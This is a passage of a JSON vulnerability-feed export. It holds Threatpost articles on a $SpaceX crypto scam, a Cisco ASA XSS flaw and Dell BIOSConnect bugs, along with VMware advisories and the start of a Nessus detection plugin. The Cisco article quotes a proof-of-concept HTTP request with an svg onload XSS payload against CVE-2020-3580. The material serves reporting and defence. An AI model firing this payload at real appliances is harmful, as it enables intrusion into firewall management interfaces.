Tenable said that it reached out to the platform about the situation, but it hasn\u2019t yet had a response.\n\n## **MetaMask and Uniswap: DeFi Depths**\n\nTenable\u2019s research uncovered that the websites include step-by-step directions on installing the browser-based cryptocurrency wallet called MetaMask on their computers. The version of MetaMask being pushed is the legitimate application/browser extension, used by millions of coin enthusiasts, and it\u2019s unlikely to raise red flags with victims, according to the analysis.\n\nThe next step is to direct victims to use a custom Uniswap link that allows them to import a $SpaceX coin. Uniswap is a decentralized exchange (DEX) in the world of decentralized finance (DeFi) protocols, Narang explained.\n\n\u201cAs a DeFi protocol, Uniswap allows cryptocurrency holders to exchange (or swap) tokens on the platform without a centralized entity being involved, hence the decentralized nature,\u201d he said. \u201cUniswap [also] allows individuals to create their own tokens to be tradeable on the platform.\u201d He added, \u201cAt the same time, the lack of a central authority is one of the reasons why these scams are able to operate successfully.\u201d\n\nAlthough $SpaceX coins don\u2019t actually exist as real currency, Uniswap doesn\u2019t block the transaction, Tenable found. It does, however, surface a warning that the supposed $SpaceX currency \u201cdoesn\u2019t appear on the active token list(s)\u201d and tells the user to make sure that \u201cthis is the token that you want to trade.\u201d\n\nOnce imported, the user is presented with several screenshots showing how they can cash out their Ethereum tokens for more $SpaceX coins, and how they can view their stash in the MetaMask wallet.\n\n\u201c[Conventional cryptocurrency scams](<https://threatpost.com/attackers-cashing-in-on-cryptocurrency-with-increased-scams/132275/>) ask users to send cryptocurrency to a specific address in order to \u2018double\u2019 their money, which never happens,\u201d Narang explained. \u201cHowever, this scam is actually quite nefarious. It creates a sense of legitimacy through the use of a notable DEX platform like Uniswap, an actual token smart contract, and the visual confirmation of tokens appearing within a user\u2019s MetaMask wallet.\u201d\n\n## **Putting Fake $SpaceX Coins into Circulation**\n\nThe campaigns are proving successful because instead of out-and-out stealing any money that people pay into the scam, the crooks deliver a fake coins into unwitting victims\u2019 accounts to give them a false sense of legitimacy. They\u2019ve also been adding liquidity to the mix and performing a classic scam move called a \u201crug pull,\u201d Tenable found.\n\nIt works like this: In order to list and facilitate the trading of any coin on Uniswap, there must be liquidity, or financial backing, to the exchange. As people buy into the \u201ccontract,\u201d or trading deal, more money and liquidity hits the system and it becomes self-sustaining. That is, until the scammers decide to cash out, i.e., \u201cpull the rug,\u201d taking the funding provided by the dupes with them and leaving the $SpaceX coins worthless.\n\n\u201cThe only address capable of moving funds out of the contract is the creator. So even if the scammers don\u2019t pull the rug right away, current $SpaceX coin holders are unable to get their funds back anyway,\u201d Narang explained.\n\nHe added, \u201cThe scammers have provided a total liquidity of 60 Ethereum coins (20 for each contract) at a combined value of $146,300.44 at the time of funding.\u201d That makes for a tidy little profit, given the volume of other \u201cinvestments\u201d made by victims.\n\nThe scammers are also artificially manipulating the price of individual $SpaceX coins by creating coins and then sending them out of circulation by storing them in wallets on popular exchanges like Vb, Binance and Huobi, Narang said.\n\n\u201cSince these fraudulent $SpaceX coins aren\u2019t listed on any of these exchanges, the coins sent to these wallets cannot be returned and are lost forever, effectively burning them from the supply,\u201d he explained. \u201cMy understanding is that through burning these coins, the scammers are reducing the supply of available coins, thus driving up the perceived price of the $SpaceX coin.\u201d\n\nIn all, Tenable found that when the fake $SpaceX contracts were created, the scammers minted 1 billion coins in each contract and added liquidity to the contract for 200 million of them. Then they \u201cburned\u201d the remaining 800 million.\n\n## **Red Flags in a Sea of Crypto-Craziness**\n\nWhile the campaign is intensely savvy in its legitimate-seeming details, there are a few tell-tale signs that all is not what it seems. For one, the original ads are hosted on compromised YouTube accounts.\n\n\u201cWhen they appear, the name of the user associated with the advertisement is visible,\u201d Narang explained. \u201cWhen browsing the user\u2019s profile\u2026many of the accounts I encountered were created between 10-12 years ago. In [one] instance, there are no other videos associated with the account, except for the one used in the scam advertisement, but that may vary. It is likely these are dormant YouTube accounts, which scammers were able to compromise to promote their dodgy advertisements.\u201d\n\nSecondly, it\u2019s important to adhere to cautionary signs when using a DEX. Even though they operate autonomously and provide no recourse for fraudulent transactions as a centralized, traditional bank would, they do offer warnings, such as the one that Uniswap displayed about the scam token not appearing on active token lists.\n\nDEX entities also add banners when there\u2019s an unknown source for a new contract, which users should see as a red flag before importing the token contract and swapping it for their cryptocurrency.\n\n\u201cThis is one of the first times we\u2019ve seen scammers pivot away from the conventional cryptocurrency scams of promising to double cryptocurrency and offering up a fake coin through DeFi platforms,\u201d wrote Narang said. \u201cDeFi scams aren\u2019t new, but seeing the adoption of them within the context of Elon-Musk-related cryptocurrency fraud is new and unique.\u201d\n\nAnd finally, the ad template is a bit amateurish and doesn\u2019t seem like a product that would be put out by Musk &amp; Co. Also, the use of the Tesla logo is entirely out of place, Narang pointed out.\n\n## **How Cryptocurrency Investors Can Protect Themselves from Fake Coins **\n\nThe main way to avoid scams like this is to research, research, research, Narang advised.\n\nLook for the aforementioned red flags, of course. But also, enthusiasts should be wary of fake coins for real projects: \u201cWhile there is no such thing as a $SpaceX coin\u2026there is a low barrier to entry to create a token contract on the Ethereum network using the same name as a real project.\u201d\n\nThus, it\u2019s important to look for official announcements from the creators of these projects \u2013 for instance, independently verify that Elon Musk is, in fact, launching such a coin, by looking for official press releases and news coverage, for instance.\n\n\u201cThey will typically share details about the release of a token contract as well as what the verified contract address is prior to deployment,\u201d Narang said.\n\nAlso, it\u2019s important to keep in mind that reviews can easily be faked.\n\n\u201cEtherscan, one of the most popular blockchain explorers for the Ethereum network, is often where cryptocurrency enthusiasts go to obtain information, such as activity related to various Ethereum-based projects,\u201d Narang said. \u201cIn the case of the fraudulent $SpaceX contracts, scammers have seeded the comments section of these pages with fake social proof. The intention behind flooding these pages with fake social proof is to ensure that any comments calling out the fraudulent nature of the $SpaceX coins get lost in the noise.\u201d\n\nIn general, it\u2019s easy to get caught up in the hype of it all, Narang warned, and crooks know this \u2013 thus, cryptocurrency scams abound out there (even [Steven Seagal was suckered](<https://threatpost.com/crypto-crook-steven-segal-scam/163612/>) into participating). So if there\u2019s any doubt at all about the legitimacy of a coin or project, it\u2019s probably wise to just sit it out.\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free!**\n", "cvss3": {}, "published": "2021-06-24T15:44:56", "type": "threatpost", "title": "Musk-Themed '$SpaceX' Cryptoscam Invades YouTube Ads", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3580"], "modified": "2021-06-24T15:44:56", "id": "THREATPOST:CB4A70D64DFB759DFD6E7A4029D48E10", "href": "https://threatpost.com/musk-spacex-cryptoscam-youtube-advertising/167219/", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-06-25T17:22:55", "description": "Researchers have dropped a proof-of-concept (PoC) exploit on Twitter for a known cross-site scripting (XSS) vulnerability in the Cisco Adaptive Security Appliance (ASA). The move comes as reports surface of in-the-wild exploitation of the bug.\n\nResearchers at Positive Technologies published the PoC for the bug (CVE-2020-3580) on Thursday. One of the researchers there, Mikhail Klyuchnikov, noted that there were a heap of researchers now chasing after an exploit for the bug, which he termed \u201clow-hanging\u201d fruit.\n\n> \ud83c\udf81PoC for XSS in Cisco ASA (CVE-2020-3580)\n> \n> POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 \nHost: ciscoASA.local \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 44\n> \n> SAMLResponse=\"&gt;&lt;svg/onload=alert('PTSwarm')&gt; [pic.twitter.com/c53MKSK9bg](<https://t.co/c53MKSK9bg>)\n> \n> \u2014 PT SWARM (@ptswarm) [June 24, 2021](<https://twitter.com/ptswarm/status/1408050644460650502?ref_src=twsrc%5Etfw>)\n\n> The hunt for low hanging CVE-2020-3580 by [@ptswarm](<https://twitter.com/ptswarm?ref_src=twsrc%5Etfw>) has begun. \nA lot of submissions/duplicates are waiting for [@Bugcrowd](<https://twitter.com/Bugcrowd?ref_src=twsrc%5Etfw>) and [@Hacker0x01](<https://twitter.com/Hacker0x01?ref_src=twsrc%5Etfw>) [#bugbounty](<https://twitter.com/hashtag/bugbounty?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 n1 (@__mn1__) [June 24, 2021](<https://twitter.com/__mn1__/status/1408064449835978760?ref_src=twsrc%5Etfw>)\n\nMeanwhile, Tenable researchers published an alert about the PoC, noting that it has started to see cyberattacks using the vulnerability on targets in the wild.\n\n\u201cTenable has also received a report that attackers are exploiting CVE-2020-3580 in the wild,\u201d according to its [Thursday alert](<https://www.tenable.com/blog/cve-2020-3580-proof-of-concept-published-for-cisco-asa-flaw-patched-in-october>). \u201cWith this new information, Tenable recommends that organizations prioritize patching CVE-2020-3580.\u201d\n\nAnd indeed, the PT PoC tweet was met with plenty of \u201cOoh thanks\u201d and \u201cthank you so much\u201d responses, presumably from would-be hackers.\n\n> Thanks\ud83d\ude00, do we have to be authenticated?\n> \n> \u2014 Qasim (@00x88x) [June 24, 2021](<https://twitter.com/00x88x/status/1408069865798131726?ref_src=twsrc%5Etfw>)\n\nMeanwhile, researchers at WebSec noted that the bug could be exploited for more than XSS:\n\n> You could have gotten 2 CVE numbers for this, as this is not just XSS but also CSRF.\n> \n> \u2014 WebSec (@websecnl) [June 25, 2021](<https://twitter.com/websecnl/status/1408344288900128769?ref_src=twsrc%5Etfw>)\n\n\u201cResearchers often develop PoCs before reporting a vulnerability to a developer and publishing them allows other researchers to both check their work and potentially dig further and discover other issues,\u201d Claire Tills, senior research engineer at Tenable, told Threatpost. \u201cPoCs can also be used by defenders to develop detections for vulnerabilities. Unfortunately, giving that valuable information to defenders means it can also end up in the hands of attackers.\u201d\n\nGiven that a patch has been available for this vulnerability for several months, organizations are able to protect themselves which isn\u2019t the case with 0-day disclosures, she pointed out. \u201cHowever, unpatched vulnerabilities continue to haunt many organizations,\u201d Tillis added. \u201cThe public availability of a PoC is another stark reminder that effective patching is a vital step for organizations to protect themselves.\u201d\n\n## **Real-World Attacks for Cisco ASA**\n\nThe Cisco ASA is a [cybersecurity perimeter-defense appliance](<https://www.cisco.com/c/en/us/products/security/adaptive-security-appliance-asa-software/index.html>) that combines firewall, antivirus, intrusion prevention and virtual private network (VPN) capabilities, all meant to stop threats from making it onto corporate networks. A compromise of the device is akin to unlocking the front door of the castle for storming cyberattackers.\n\nXSS attacks occur when malicious scripts are injected into otherwise benign and trusted websites; any visitors to the compromised websites are thus subject to drive-by attacks.\n\nSuccessful exploitation in this case means that unauthenticated, remote attackers could \u201cexecute arbitrary code within the [ASA] interface and access sensitive, browser-based information,\u201d Tenable added.\n\n[](<https://threatpost.com/newsletter-sign/>) \nOnce in, they could modify the device\u2019s configuration, according to Leo Pate, an application security consultant at nVisium.\n\nHowever, the target would need to be logged into the ASA for the attackers to see any joy. \u201cWhile this sounds dangerous, exploiting this vulnerability requires an administrative user to login and navigate to the webpage where the attacker uploaded the malicious code,\u201d he added.\n\nAs Tenable researchers said: \u201cAn attacker would need to convince \u2018a user of the interface\u2019 to click on a specially crafted link.\u201d This can be accomplished via a spear-phishing email campaign targeting probable ASA users using malicious links, or via watering-hole attacks.\n\n\u201cThe attack vector to get this in the hands of the right people is complex requiring a firewall administrator to be duped into clicking a cleverly crafted link,\u201d Andrew Barratt, managing principal for solutions and investigations at Coalfire, told Threatpost. \u201cFirewall administrators will need to ensure they\u2019re not accessing links to the ASA interface that appear to originate from outside.\u201d\n\nTenable declined to provide more information on the real-world attacks when asked by Threatpost.\n\nThanks to the sheer size of its footprint (including inside Fortune 500 companies), the Cisco ASA is no stranger to attention from cyberattackers. Last year for example, public PoC for another bug in the device ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)) started making the rounds, leading to a [spate of exploitation efforts](<https://threatpost.com/attackers-exploiting-high-severity-network-security-flaw-cisco-warns/157756/>).\n\n## **Patch Now: Cisco ASA XSS Security Hole**\n\nThe flaw tracked as CVE-2020-3580 [was patched](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe>) on October 21 as part of a group of XSS issues in Cisco\u2019s ASA as well as the Firepower Threat Defense (FTD) software, which is a unified firewall image that includes ASA management.\n\n\u201cAll four vulnerabilities exist because Cisco ASA and FTD software web services do not sufficiently validate user-supplied inputs,\u201d according to the advisory, which noted that the bug in question rates 6.1 out of 10 on the CVSSv3 vulnerability-severity scale.\n\nThe number of vulnerable devices could be significant: [Researchers with Rapid7](<https://blog.rapid7.com/2020/07/23/cve-2020-3452-cisco-asa-firepower-read-only-path-traversal-vulnerability-what-you-need-to-know/>) last year found there to be 85,000 internet-accessible ASA devices. Of course, a good percentage of those could be patched against this particular vulnerability.\n\n\u201cExploits for appliances that may sit on the vanishing perimeter generally garner interest [from hackers], but fortunately in this case there are at least two things working against rampant exploitation,\u201d Tim Wade, technical director for the CTO team at Vectra, told Threatpost. \u201cFirst, a patch has been available since October. Second, an element of social engineering is required. This should provide some level of confidence for organizations with reasonable patch cycles and a security awareness program.\u201d\n\nUpdating to the latest versions of the affected devices\u2019 software is of course recommended; however, there\u2019s more that can be done to mitigate the vulnerability, nVisium\u2019s Pate noted.\n\n\u201cOrganizations can ask their internal teams if they need to use the web management interface, and if so, is it available to everyone on the internet or just internally to our organization? If the web management interface isn\u2019t needed, then it should be disabled,\u201d he told Threatpost.\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free!**\n", "cvss3": {}, "published": "2021-06-25T16:08:38", "type": "threatpost", "title": "Cisco ASA Bug Now Actively Exploited as PoC Drops", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3452", "CVE-2020-3580"], "modified": "2021-06-25T16:08:38", "id": "THREATPOST:0499757784EF5DB6F115661A76B7C352", "href": "https://threatpost.com/cisco-asa-bug-exploited-poc/167274/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-06-25T16:24:51", "description": "UPDATE\n\nA high-severity series of four vulnerabilities can allow remote adversaries to gain arbitrary code execution in the pre-boot environment on Dell devices, researchers said. They affect an estimated 30 million individual Dell endpoints worldwide.\n\nAccording to an analysis from Eclypsium, the bugs affect 129 models of laptops, tablet and desktops, including enterprise and consumer devices, that are protected by Secure Boot. Secure Boot is a security standard aimed at making sure that a device boots using only software that is trusted by the device original equipment manufacturer (OEM), to prevent rogue takeovers.\n\nThe bugs allow privileged network adversaries to circumvent Secure Boot protections, control the device\u2019s boot process, and subvert the operating system and higher-layer security controls, researchers at Eclypsium said on Thursday. They carry a cumulative CVSS score of 8.3 out of 10.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSpecifically, the issues affect the BIOSConnect feature within Dell SupportAssist (a technical support solution that comes preinstalled on most Windows-based Dell machines). BIOSConnect is used to perform remote OS recoveries or to update the firmware on the device.\n\n\u201cTechnology vendors of all types are increasingly implementing over-the-air update processes to make it as easy as possible for their customers to keep their firmware up to date and recover from system failures,\u201d researchers noted [in an analysis](<https://www.eclypsium.com/2021/06/24/biosdisconnect/.>). \u201cAnd while this is a valuable option, any vulnerabilities in these processes, such as those we\u2019ve seen here in Dell\u2019s BIOSConnect, can have serious consequences.\u201d\n\nThe report noted that the specific vulnerabilities allow an attacker to remotely exploit the UEFI firmware of a host and gain control over the most privileged code on the device.\n\n\u201cThis combination of remote exploitability and high privileges will likely make remote update functionality an alluring target for attackers in the future,\u201d the report concluded.\n\n## **Insecure TLS Connection: Impersonating Dell **\n\nThe first vulnerability (CVE-2021-21571) is the beginning of a chain that can lead to remote code execution (RCE).\n\nWhen BIOSConnect attempts to connect to the backend Dell HTTP server to perform a remote update or recovery, it enables the system\u2019s BIOS (the firmware used to perform hardware initialization during the booting process) to reach out to Dell backend services over the internet. Then, it coordinates an update or recovery process.\n\nThe issue is that the TLS connection used to connect BIOS to the backend servers will accept any valid wildcard certificate, Eclypsium researchers said. So, an attacker with a privileged network position can intercept that connection, impersonate Dell and deliver attacker-controlled content back to the victim device.\n\n\u201cThe process of verifying the certificate for dell.com is done by first retrieving the DNS record from the hard-coded server 8.8.8.8, then establishing a connection to [Dell\u2019s download site],\u201d according to the analysis. \u201cHowever, any valid wildcard certificate issued by any of the built-in Certificate Authorities contained within the BIOSConnect feature in BIOS will satisfy the secure connection condition, and BIOSConnect will proceed to retrieve the relevant files. The bundle of CA root certificates in the BIOS image was sourced from Mozilla\u2019s root certificate file (certdata.txt).\u201d\n\n## **Overflow Vulnerabilities Enabling Arbitrary Code Execution**\n\nOnce this first \u201cgatekeeper\u201d bug is exploited to deliver malicious content back to the victim machine, attackers then have a choice of three distinct and independent overflow vulnerabilities (CVE-2021-21572, CVE-2021-21573, CVE-2021-21574), any of which can be used to gain pre-boot RCE on the target device, researchers said.\n\nTwo of the vulnerabilities affect the OS recovery process, while the third affects the firmware update process, according to Eclypsium, which isn\u2019t releasing further technical details yet.\n\n\n\nThe attack scenario: Click to enlarge. Source: Eclypsium\n\nAny attack scenario would require an attacker to be able to redirect the victim\u2019s traffic, such as via a machine-in-the-middle (MITM) attack \u2013 something that\u2019s not much of a barrier, researchers said.\n\n\u201cMachine-in-the-middle attacks are a relatively low bar to sophisticated attackers, with techniques such as ARP spoofing and [DNS cache poisoning](<https://threatpost.com/dnspooq-flaws-allow-dns-hijacking-of-millions-of-devices/163163/>) being well-known and easily automated,\u201d according to the report. \u201cAdditionally, [enterprise VPNs](<https://threatpost.com/sonicwall-botches-critical-vpn-bug/167152/>) and other network devices have become a top target of attackers, and flaws in these devices can allow attackers to redirect traffic. And finally, end-users working from home are increasingly reliant on SOHO networking gear. Vulnerabilities are quite common in these types of consumer-grade networking devices and have been exploited in widespread campaigns.\u201d\n\nThe groundwork effort to carry out an attack is likely a positive tradeoff for cybercriminals, given that a successful compromise of the BIOS of a device would allow attackers to establish ongoing persistence while controlling the highest privileges on the device. This is because they would control the process of loading the host operating system, and would be able to disable protections in order to remain undetected, the report noted.\n\n\u201cThe virtually unlimited control over a device that this attack can provide makes the fruit of the labor well worth it for the attacker,\u201d Eclypsium researchers said.\n\n## **Dell Issues Patches**\n\nDell has now pushed out patches for BIOS on all of the affected systems. For details, refer to [its advisory](<https://www.dell.com/support/kbdoc/000188682>).\n\n\u201cIt is advisable to run the BIOS update executable from the OS after manually checking the hashes against those published by Dell,\u201d Eclypsium recommended, rather than relying on BIOSConnect to apply BIOS updates.\n\n_**This article was updated at 9:30 a.m. on June 25, to reflect that all patches have now been issued.**_\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free!**\n", "cvss3": {}, "published": "2021-06-24T10:00:42", "type": "threatpost", "title": "30M Dell Devices at Risk for Remote BIOS Attacks, RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3580", "CVE-2021-21571", "CVE-2021-21572", "CVE-2021-21573", "CVE-2021-21574"], "modified": "2021-06-24T10:00:42", "id": "THREATPOST:21DEB20ED3F651F477BD38ECDF58B94B", "href": "https://threatpost.com/dell-bios-attacks-rce/167195/", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}], "vmware": [{"lastseen": "2022-05-26T00:56:14", "description": "3\\. Advisory Details \n\nA URL on the administrative interface of the VMware Carbon Black Cloud Workload appliance can be manipulated to bypass authentication. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-01T00:00:00", "type": "vmware", "title": "VMware Carbon Black Cloud Workload appliance update addresses incorrect URL handling vulnerability (CVE-2021-21982)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-01T00:00:00", "id": "VMSA-2021-0005", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0005.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-08-02T18:42:21", "description": "3\\. VMware Carbon Black App Control updates address authentication bypass (CVE-2021-21998) \n\nThe VMware Carbon Black App Control management server has an authentication bypass. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.4.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-22T00:00:00", "type": "vmware", "title": "VMware Carbon Black App Control update addresses authentication bypass (CVE-2021-21998)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21998"], "modified": "2021-06-22T00:00:00", "id": "VMSA-2021-0012", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0012.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T23:53:14", "description": "3\\. VMware Tools, VMRC and VMware App Volumes update addresses a local privilege escalation vulnerability (CVE-2021-21999) \n\nVMware Tools for Windows, VMRC for Windows and VMware App Volumes contain a local privilege escalation vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.8.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-22T00:00:00", "type": "vmware", "title": "VMware Tools, VMRC and VMware App Volumes update addresses a local privilege escalation vulnerability (CVE-2021-21999)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21999"], "modified": "2021-06-22T00:00:00", "id": "VMSA-2021-0013", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0013.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-02-24T14:52:01", "description": "An authentication bypass vulnerability exists in the VMware Carbon Black App Control management server. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary actions with administrative privileges.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-23T00:00:00", "type": "nessus", "title": "VMware Carbon Black App Control 8.0.x / 8.1.x / 8.5.x < 8.5.8 / 8.6.x < 8.6.2 Authentication Bypass (VMSA-2021-0012)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21998"], "modified": "2022-07-19T00:00:00", "cpe": ["cpe:/a:vmware:carbon_black_app_control"], "id": "VMWARE_CB_APP_CONTROL_VMSA-2021-0012.NASL", "href": "https://www.tenable.com/plugins/nessus/152047", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152047);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/19\");\n\n script_cve_id(\"CVE-2021-21998\");\n script_xref(name:\"IAVA\", value:\"2021-A-0295-S\");\n script_xref(name:\"VMSA\", value:\"2021-0012\");\n\n script_name(english:\"VMware Carbon Black App Control 8.0.x / 8.1.x / 8.5.x < 8.5.8 / 8.6.x < 8.6.2 Authentication Bypass (VMSA-2021-0012)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an authentication bypass vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"An authentication bypass vulnerability exists in the VMware Carbon Black App Control management server. An \nunauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary actions with \nadministrative privileges.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0012.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Carbon Black App Control 8.5.8, 8.6.2, or later, or apply the relevant hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n 